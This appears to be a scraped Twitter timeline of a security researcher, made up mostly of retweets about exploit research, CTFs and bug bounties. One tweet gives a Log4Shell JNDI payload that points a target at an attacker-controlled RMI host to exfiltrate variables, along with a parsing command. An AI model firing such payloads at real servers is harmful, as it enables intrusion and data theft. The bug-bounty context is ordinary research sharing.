Tweets
- Tweets, current page.
- Tweets & replies
- Media
You blocked @haqpl
Are you sure you want to view these Tweets? Viewing Tweets won't unblock @haqpl
-
#gtfowithannualgoals year means nothing, focus on todayThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html …
Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
Then just parse them: split -a 8 -l 1 rmi_calls && ls x* | xargs -I{} java -jar SerializationDumper-v1.13.jar -f {}pic.twitter.com/C9AoukIPTh
Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
In that way, you can setup Java RMI registry and watch how goodness arrives avoiding LDAP query length limitations
./rmi_dump.sh 1099 eth0
${jndi:rmi://host:1099/very_long_variable_to_exfiltrate}
https://gist.github.com/haqpl/f6f41a3ff7cbc9ed1f27c4a1457103f8 …
#Log4Shell#log4j#BugBountyShow this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
Relaying Kerberos only using native Windows is so
As a normal user we can trigger a Kerberos authentication for SYSTEM that we can relay to services such as LDAP to read LAPS or configure rbcd.
Privesc/Lateral movement in any network without enforced signing, which is default
pic.twitter.com/m6dM3BjyFf
Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
Elevate to SYSTEM from a Service Account with Impersonate privileges by only using C# code and the built-in RPC runtime! Great research from
@tiraniddo https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html …pic.twitter.com/5xEkrhsBUx
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
We had a lot of fun during
@athackcon. Secured 4th place in the CTF.#athackpic.twitter.com/HvgUs5R36I
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
مقتطفات من كلمة معالي المستشار تركي آل الشيخ وتكريمه للفائزين في تحديات
#AtHackpic.twitter.com/c6WwEESDqnThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
The day started well. Just registered for
@athackcon CTF, very exited!pic.twitter.com/jIGtU5f056
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
thanks to mine and
@haqpl $ 50k report@github with its@npmjs are improving the security for all
"we received a report... of a vulnerability that would allow an attacker to publish new versions of any npm package..."
#npm#bugbounty#infosechttps://twitter.com/npmjs/status/1460382530172071938 …Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
#RedTeam are you trying to stay under the radar? Read our deep dive into a stealthier DLL hollowing / memory allocation variant, analyzing advantages, pitfalls and artifacts https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/ …#malware#HackingGoodpic.twitter.com/ycLB6ER2xc
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
3rd part of my series on Chrome Browser Exploitation is out. Covered topics include: 1. General memory management 2. Pointer tagging/compression 3. Objects in v8 memory 4. Garbage Collection https://seal9055.com/blog/browser/memory_management …
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
Just watched "Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond" - must-read research by
@intruder_io's Daniel Thatcherhttps://www.intruder.io/research/practical-http-header-smuggling …Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
Here's our writeup of CVE-2021-37748 and CVE-2021-37915. Lessons learned in ARM exploitation by @adamsimuntis and@mislusnys. https://www.secforce.com/blog/exploiting-grandstream-ht801-ata-cve-2021-37748-cve-2021-37915/ …#cve#exploit#arm#infosec#hackingGoodpic.twitter.com/lJaaJS7EYM
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
#ASIS#CTF Congrats to top 3 teams:@pb_ctf@justCatTheFish and@kalmarunionenDM I hope that you enjoy


pic.twitter.com/VNfDd61Lp7
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
New video about #browser security available
You will learn how to:
- Download Firefox ASAN
- Hook @firefox with Frida - List all Firefox modules & exports functions - Hook methods & print HTTP traffic - Create in-process fuzzing@fridadotre scripthttps://www.youtube.com/watch?v=XZFtIZaZSoM …Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
New post: Abusing
#Slack's file-sharing functionality to de-anonymise fellow workspace members.

#privacy#XSLeakhttps://jub0bs.com/posts/2021-10-12-xsleak-stack/ …Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
Together with
@ndevtk we created a new XSS challenge! The trick is neat so better take your chances
. Could come very handy one day
https://so-xss.terjanq.me/
#xss#xsschallenge#ctfShow this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
Content of my
#RomHack2021 talk "Breaking Azure AD joined endpoints in Zero Trust environments" is up! Video: https://www.youtube.com/watch?v=OigKnI68Sfo … Slides (pdf): https://dirkjanm.io/assets/raw/romhack_dirkjan.pdf … As usual all the links to my talk materials are also on http://dirkjanm.io/talksThanks. Twitter will use this to make your timeline better. UndoUndo -
Maciej Piechota Retweeted
New Project Zero blog post: Fuzzing Closed-Source JavaScript Engines with Coverage Feedback, https://googleprojectzero.blogspot.com/2021/09/fuzzing-closed-source-javascript.html …
Thanks. Twitter will use this to make your timeline better. UndoUndo
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

